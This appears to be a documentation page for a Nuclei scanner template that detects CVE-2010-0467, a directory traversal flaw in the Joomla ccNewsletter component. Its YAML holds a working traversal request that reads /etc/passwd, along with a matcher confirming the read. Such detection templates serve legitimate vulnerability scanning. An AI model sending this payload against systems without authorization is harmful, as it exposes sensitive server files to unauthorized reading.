Joomla! Component CCNewsLetter - Local File Inclusion
ID: CVE-2010-0467
Severity: medium
Author: daffainfo
Tags: cve2010,cve,joomla,lfi,edb,chillcreations
Description
Section titled “Description”A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-0467
info: name: Joomla! Component CCNewsLetter - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Apply all relevant security patches and upgrades. reference: - https://www.exploit-db.com/exploits/11282 - https://nvd.nist.gov/vuln/detail/CVE-2010-0467 - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html - http://www.exploit-db.com/exploits/11277 - http://www.exploit-db.com/exploits/11282 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.06955 epss-percentile: 0.93927 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: chillcreations product: com_ccnewsletter tags: cve2010,cve,joomla,lfi,edb,chillcreations
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502210085803394ffac9f01bd4fa3069b9e96acaa82c89460cfd908b791ea91dfb2dba7022020c1e3addc35d9370ecd5aa7a32f82ef2d2c0a93bddd7c0a876a4cd1ffab63b2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-0467.yaml"